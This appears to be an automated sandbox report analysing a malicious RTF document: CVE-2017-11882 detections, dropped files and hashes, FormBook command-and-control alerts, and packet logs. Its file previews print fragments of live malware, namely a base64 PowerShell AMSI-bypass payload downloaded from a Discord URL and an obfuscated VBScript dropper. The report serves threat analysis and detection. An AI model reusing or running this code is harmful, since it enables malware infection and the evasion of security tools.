                                                                RFQ00_3779028392.docGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                new offers885111832.docxGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                lifehacks_6582318243.docxGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                counter-1248368226.xlsGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                counter-1248368226.xlsGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                CU-6431 report.xlsmGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                DHL Original shipping Document_pdf.ppamGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                New Price List.ppamGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                Hotel Guest List.ppamGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                IRQ2107798.ppamGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                AWB.ppamGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                FILE_915494026923219.xlsmGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                IRQ2107797.ppamGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                part-1500645108.xlsbGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                invoice template 33142738819.docxGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                item-40567503.xlsbGet hashmaliciousBrowse
                                                                • 162.159.135.233

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mono[1].jpg
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):1920730
                                                                Entropy (8bit):4.744282074220393
                                                                Encrypted:false
                                                                SSDEEP:24576:npBYI4sL/QQX5YfBHzOK+haVWm7KCXcDyOm6sJ86Ff:bX5YZHWaVWmBK6Z
                                                                MD5:715FB9AA84B3E1C2F82643AA678B63DC
                                                                SHA1:4505A5F3B979F878F126D8B2232F2EA4BAB53050
                                                                SHA-256:ED37BF943532EAB0A966E112C865FA63D411C30CE4144758DA7246C578641EE6
                                                                SHA-512:EAF5F420A465FC248CB65F61B96B52E067FEC047D5781CAD067ACCEBC374FEFBB1987E29CA66FDBB8771420C447CE9BD3278444D68BEDF4747D1C637FCD2AD87
                                                                Malicious:false
                                                                Reputation:low
                                                                IE Cache URL:https://cdn.discordapp.com/attachments/915347845752705109/915799800740462662/mono.jpg
                                                                Preview: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYSA9IFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uQW1zaVV0JysnaWxzJykNCiRoID0gIjQ0NTY2MjUyMjA1NzUyNjMxNzQ0NTI1NTQ4NDciDQokcyA9IFtzdHJpbmddKDAuLjEzfCV7W2NoYXJdW2ludF0oNTMrKCRoKS5zdWJzdHJpbmcoKCRfKjIpLDIpKX0pLXJlcGxhY2UgIiAiDQokYiA9ICRhLkdldEZpZWxkKCRzLCdOb25QdWJsaWMsU3RhdGljJykNCiRiLlNldFZhbHVlKCRudWxsLCR0cnVlKTsgJGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOw0KV3JpdGUtSG9zdCAiKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):14848
                                                                Entropy (8bit):4.799043362230707
                                                                Encrypted:false
                                                                SSDEEP:192:lbhYugo5qhwPXkOCr1yJ9q2Jh9tp3F5lftFw+:l74K/kOCrgo2Jh9tpV5lft+
                                                                MD5:84A4E16FBE2F97505E3690DBE5CC8CC6
                                                                SHA1:B0120FED89D5CD89FBBF2E8FE6BBE0D1023CC27E
                                                                SHA-256:F333DE4172914289AA5E533A28072E0263C654F267AE8545344A91B6AC30F2F5
                                                                SHA-512:5DF673BF935489ACA6673CE8C697012302AD9D057713EB760516A450872EA084E3ADA5342D00DE86AEBB4A320E6508B4C32B4A2CFE91200C3FD728D4D67B141C
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp, Author: John Davison
                                                                • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp, Author: ReversingLabs
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{96B102F3-113F-4941-A0F4-82256A0F2293}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1024
                                                                Entropy (8bit):1.1722028273607172
                                                                Encrypted:false
                                                                SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                                MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                                SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                                SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                                SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                                Malicious:false
                                                                Preview: ..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F053B286-DC2A-4E74-A6C1-CD6052CFBDE3}.tmp
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1024
                                                                Entropy (8bit):0.05390218305374581
                                                                Encrypted:false
                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                Malicious:false
                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\Client.vbs
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8420
                                                                Entropy (8bit):5.299709934891769
                                                                Encrypted:false
                                                                SSDEEP:192:Kugo5qhwPXkOCr1yJ9q2Jh9tp3F5lftFw:H4K/kOCrgo2Jh9tpV5lfti
                                                                MD5:49F3D501EE40E5B36283BBF99C2280C7
                                                                SHA1:7BF29C7C2C47AB03B79AFD3DCA47C2ABA41CDE67
                                                                SHA-256:3130B03EED2B3785BE43C7F5872CBDDED02C64AC2E688C06FBEF6D5A4223FB11
                                                                SHA-512:91285726CE907AE0D2E50EBF736E88672BE31082710B207E6BCF33C7FDCF534BAFE18B94F0575BCA7C61D6F9D231D712F33660027BBEB7BA52B5024139C2F933
                                                                Malicious:true
                                                                Preview: SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..sKeys0xCRC341414141 = Eval (E0xCRC341414141(")"""",emaNtpircS.tpircSW,emaNlluFtpircS.tpircSW(ecalper"))..GetObject (E0xCRC341414141("B0A85DF40C00-9BDA-0D11-0FC1-62CD539F:wen"))..F = lValue0xCRC341414141 + "\" + WScript.ScriptName..If sKeys0xCRC341414141 = lValue0xCRC341414141 Then..WScript.Quit()..SPLevel0xCRC341414141 = E0xCRC341414141(G0xCRC341414141() + H0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Else..End If........Function F0xCRC341414141()..Execute("TristateUseDefault0xCRC341414141= ArRAy (""eT"",""aE"",""rC"")")..'Check the output directories drive to ensure there is enough free space for the fil
                                                                C:\Users\user\AppData\Local\Temp\Client.vbs:Zone.Identifier
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:gAWY3n:qY3n
                                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                Malicious:true
                                                                Preview: [ZoneTransfer]..ZoneId=3..
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.LNK
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 3 04:46:12 2021, mtime=Fri Dec 3 04:46:12 2021, atime=Fri Dec 3 04:46:16 2021, length=2186553, window=hide
                                                                Category:dropped
                                                                Size (bytes):1204
                                                                Entropy (8bit):4.561561339859807
                                                                Encrypted:false
                                                                SSDEEP:24:8lWn/XTuzUVw8HCn95ewHCn9gDv3qXqR7m:8sn/XTkUrHCnjBHCndaFm
                                                                MD5:A3B72BE3BCBD2F7915B7FD05FDA7F0A5
                                                                SHA1:33AB6B089C5D1794749D98B768108603B8A32AF1
                                                                SHA-256:BF115A19DC8BA40E4716F1F7DBB25C7C8E738842D135D4C2BA9A5AF56F3FC884
                                                                SHA-512:2B2A8E9DEE248AA1E279904D257FCB0527D92E4F20C60F6684C54D297C351E6009172879C5B2AEE00B1898E0231B5E17FFFBF5A6B6B5863B0FDB62B09BAD991F
                                                                Malicious:false
                                                                Preview: L..................F.... ...j.9.....j.9.....s.......9]!..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S.-..Desktop.d......QK.X.S.-*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.9]!..S.- .SECURI~1.RTF.........S.-.S.-*...'.....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.5.3.5.0...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.rtf.K.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.5.3.5.0...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):148
                                                                Entropy (8bit):4.947941441893876
                                                                Encrypted:false
                                                                SSDEEP:3:bDuMJluscbcTLqjQWC0LUrlmxW9rbcTLqjQWC0LUrlv:bCVwTeS0LurwTeS0LS
                                                                MD5:70801AB431E88894D4028AC0B0085B37
                                                                SHA1:9A13563E46617A4E6D04276824CCEFA637FFC08F
                                                                SHA-256:C166C754A033D3D4FF0CD6F1B9DCF5DD80BBB424302016D27FE575A0A483B75C
                                                                SHA-512:38BF3792C358A93015F88E9402EAEBFD1DE58F358766D7505479CA5DAFE7CE6217B7E9439EFF6CC1846B8277F956D9139AD2E4CA7CFA3D1134A1377759239A89
                                                                Malicious:false
                                                                Preview: [folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.LNK=0..
                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.5038355507075254
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                Malicious:false
                                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.577517084185492
                                                                Encrypted:false
                                                                SSDEEP:96:chQCQMqWqvsqvJCwoEz8hQCQMqWqvsEHyqvJCwor6zdTYzHTUVMWlUVuA2:cWzoEz8WnHnor6zdSUVM8A2
                                                                MD5:22ACF8F034F3EF5AA80B8832BE5C8791
                                                                SHA1:FA3D8CB4036538DD3426AF1362C3B501855D73B8
                                                                SHA-256:20CF1AB468758945E30A3A8011DED1B377B7100BC28DB997F5B7E68B9FE1C474
                                                                SHA-512:0B78446050AC4894768201A77A63E9306E908415FEA6D46E6DD8C5B4598AACA8CBA0AB58D494DD7A48CD05FD52833DD84417D7ED7BF2C62BC7A38C6625078F43
                                                                Malicious:false
                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A2T3MU44P0BY2HKXPSH0.temp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.577517084185492
                                                                Encrypted:false
                                                                SSDEEP:96:chQCQMqWqvsqvJCwoEz8hQCQMqWqvsEHyqvJCwor6zdTYzHTUVMWlUVuA2:cWzoEz8WnHnor6zdSUVM8A2
                                                                MD5:22ACF8F034F3EF5AA80B8832BE5C8791
                                                                SHA1:FA3D8CB4036538DD3426AF1362C3B501855D73B8
                                                                SHA-256:20CF1AB468758945E30A3A8011DED1B377B7100BC28DB997F5B7E68B9FE1C474
                                                                SHA-512:0B78446050AC4894768201A77A63E9306E908415FEA6D46E6DD8C5B4598AACA8CBA0AB58D494DD7A48CD05FD52833DD84417D7ED7BF2C62BC7A38C6625078F43
                                                                Malicious:false
                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.15350.rtf
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.5038355507075254
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                Malicious:false
                                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                Static File Info

                                                                General

                                                                File type:Rich Text Format data, version 1, unknown character set
                                                                Entropy (8bit):5.164565636568734
                                                                TrID:
                                                                • Rich Text Format (5005/1) 55.56%
                                                                • Rich Text Format (4004/1) 44.44%
                                                                File name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.rtf
                                                                File size:2186553
                                                                MD5:bdacb3b17f31a06a8cfbedba2342bdf5
                                                                SHA1:9f6930782942ec4bedc162be334b97f861d24f75
                                                                SHA256:16fc1ecc295f8d7dba6647b9aeb8d538932910b24f3affe1853a82ab2c9d944a
                                                                SHA512:0ddc7a399da206bee38c3a29445c828c557a0f0ba4b36435e6787f052517d79a9b3edcc3ea1285e2ef087562ae2a0956109b747caa97bf5886161e21d3e7ff11
                                                                SSDEEP:1536:Cbz4J3fbgjEA7wcwEwrwDwlwSwEw7wlwbwXwHwlwLwzwMwOwZwww7wlwbwXwHwlT:9IVYiEe
                                                                File Content Preview:{\rtf1\posx2160{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnh

                                                                File Icon

                                                                Icon Hash:e4eea2aaa4b4b4a4

                                                                Static RTF Info

                                                                Objects

                                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                0000011FEh2embeddedPackage8587Client.vbsC:\Path\Client.vbsC:\Path\Client.vbsno
                                                                10001CF23h2embeddedEquation.33072no

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                12/02/21-21:47:21.262170ICMP382ICMP PING Windows192.168.2.22216.58.215.238
                                                                12/02/21-21:47:21.262170ICMP384ICMP PING192.168.2.22216.58.215.238
                                                                12/02/21-21:47:21.279709ICMP408ICMP Echo Reply216.58.215.238192.168.2.22
                                                                12/02/21-21:48:54.941313TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22185.230.63.177
                                                                12/02/21-21:48:54.941313TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22185.230.63.177
                                                                12/02/21-21:48:54.941313TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22185.230.63.177

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 2, 2021 21:47:22.262795925 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.262856960 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.262940884 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.283410072 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.283469915 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.339049101 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.339152098 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.354255915 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.354286909 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.354660988 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.354901075 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.608688116 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.648884058 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661634922 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661710024 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.661727905 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661767960 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661830902 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661847115 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.661851883 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661868095 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661881924 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.661894083 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.661911011 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.661921978 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661963940 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.661967039 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.661978960 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662009954 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662023067 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662061930 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662075043 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662117004 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662127018 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662172079 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662174940 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662184000 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662236929 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662251949 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662295103 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662302971 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662343025 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662348986 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662358999 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662394047 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662405968 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662450075 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662456989 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662466049 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662497044 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662511110 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662549973 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662549973 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662559986 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662590027 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662602901 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662642002 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662645102 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662657022 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662683964 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662692070 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662698030 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662734985 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662736893 CET49167443192.168.2.22162.159.135.233
                                                                Dec 2, 2021 21:47:22.662744999 CET44349167162.159.135.233192.168.2.22
                                                                Dec 2, 2021 21:47:22.662782907 CET49167443192.168.2.22162.159.135.233
